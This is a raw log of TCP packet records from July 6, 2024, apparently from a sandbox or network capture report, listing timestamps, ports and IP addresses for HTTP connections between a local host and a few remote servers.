Jul 6, 2024 13:27:09.074853897 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.074914932 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.074934959 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.074945927 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.074970961 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075043917 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075051069 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075062990 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075073004 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075084925 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075165033 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075259924 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075273037 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075284004 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075295925 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075308084 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075320959 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075331926 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075349092 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075412989 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075903893 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075915098 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075927973 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075956106 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075970888 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.075980902 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.075992107 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076004028 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076026917 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.076052904 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.076139927 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076150894 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076167107 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076179028 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076190948 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.076195955 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.076225996 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.076245070 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150116920 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150163889 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150177002 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150233030 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150250912 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150269032 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150295973 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150373936 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150424004 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150461912 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150475025 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150517941 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150551081 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150563002 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150573969 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150585890 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150609970 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150626898 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150742054 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150753021 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150783062 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150804043 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150830984 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.150846004 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150859118 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.150892019 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.151000023 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151010990 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151022911 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151036978 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151057959 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.151092052 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.151148081 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151160002 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151171923 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151185036 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151196003 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.151206970 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.151231050 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.151243925 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.169167995 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.180533886 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.361864090 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362153053 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362453938 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362508059 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362514019 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362525940 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362555981 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362569094 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362581968 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362632990 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362797022 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362807035 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362817049 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362827063 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362848043 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362876892 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.362948895 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362961054 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362972021 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362982035 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362993002 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.362999916 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363004923 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363018036 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363023043 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363032103 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363042116 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363060951 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363085985 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363210917 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363260984 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363293886 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363306999 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363318920 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363332033 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363343954 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363344908 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363357067 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.363373995 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363393068 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.363416910 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.441716909 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442027092 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442037106 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442048073 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442058086 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442070007 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442080021 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442176104 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442181110 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442181110 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442188025 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442199945 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442215919 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442224979 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442235947 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442250013 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442266941 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442446947 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442459106 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442468882 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442478895 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442490101 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442504883 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442507029 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442531109 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442550898 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442590952 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442601919 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442611933 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442621946 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442634106 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442642927 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442648888 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.442667961 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442679882 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.442701101 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.508579016 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.508603096 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.508616924 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.508646965 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.508665085 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.508713961 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.508725882 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.508755922 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.508784056 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509054899 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509078026 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509090900 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509108067 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509120941 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509141922 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509206057 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509217978 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509228945 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509263039 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509288073 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509335995 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509350061 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509361982 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509392023 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509421110 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509605885 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509654999 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509677887 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509690046 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509731054 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.509761095 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509773970 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.509814024 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510011911 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510060072 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510086060 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510097027 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510138988 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510170937 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510181904 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510193110 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510226965 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510246038 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510411024 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510461092 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510466099 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510478020 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510514021 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:09.510538101 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:27:09.510584116 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:27:12.578766108 CEST	49734	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:12.583605051 CEST	80	49734	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:12.583743095 CEST	49734	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:12.583743095 CEST	49734	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:12.588598967 CEST	80	49734	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.234579086 CEST	80	49734	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.235340118 CEST	80	49734	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.235395908 CEST	49734	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.239098072 CEST	49734	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.240109921 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.244877100 CEST	80	49735	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.245038986 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.245085001 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.250045061 CEST	80	49735	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.250129938 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.254908085 CEST	80	49735	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.965997934 CEST	80	49735	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.966598034 CEST	80	49735	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.966774940 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.969621897 CEST	49735	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.970268011 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.975030899 CEST	80	49736	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.975132942 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.975198030 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.980432987 CEST	80	49736	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:13.980520010 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:13.985301018 CEST	80	49736	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:14.809854984 CEST	80	49736	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:14.810524940 CEST	80	49736	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:14.810607910 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:14.820353985 CEST	49736	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:14.847356081 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:14.852451086 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:14.852588892 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:14.852607965 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:14.858774900 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417437077 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417449951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417468071 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417480946 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417495012 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417506933 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417521000 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417526007 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.417532921 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417546034 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417553902 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.417553902 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.417587042 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.417612076 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.419015884 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.422744989 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.422756910 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.422769070 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.422781944 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.422844887 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.422844887 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.504173040 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504184008 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504194975 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504286051 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504314899 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.504338026 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504348993 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504435062 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504448891 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.504461050 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.504530907 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.505312920 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505371094 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505381107 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505594015 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505616903 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505629063 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505655050 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.505656004 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.505681038 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.506274939 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.506287098 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.506299973 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.506339073 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.506350994 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.506362915 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.507210016 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.507222891 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.507235050 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.507244110 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.507282019 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.507308006 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.509172916 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.509200096 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.509241104 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.511663914 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.591330051 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591460943 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591476917 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591490984 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591502905 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591502905 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.591527939 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.591716051 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591728926 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591742039 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591753960 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591764927 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591777086 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591779947 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.591799021 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.591815948 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591876030 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591887951 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591900110 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.591924906 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.592330933 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592389107 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592401981 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592434883 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.592439890 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592798948 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592859030 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.592869997 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592881918 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592910051 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.592928886 CEST	49739	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:15.593018055 CEST	80	49739	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:15.593034029 CEST	80	49739	192.3.140.185	192.168.2.4
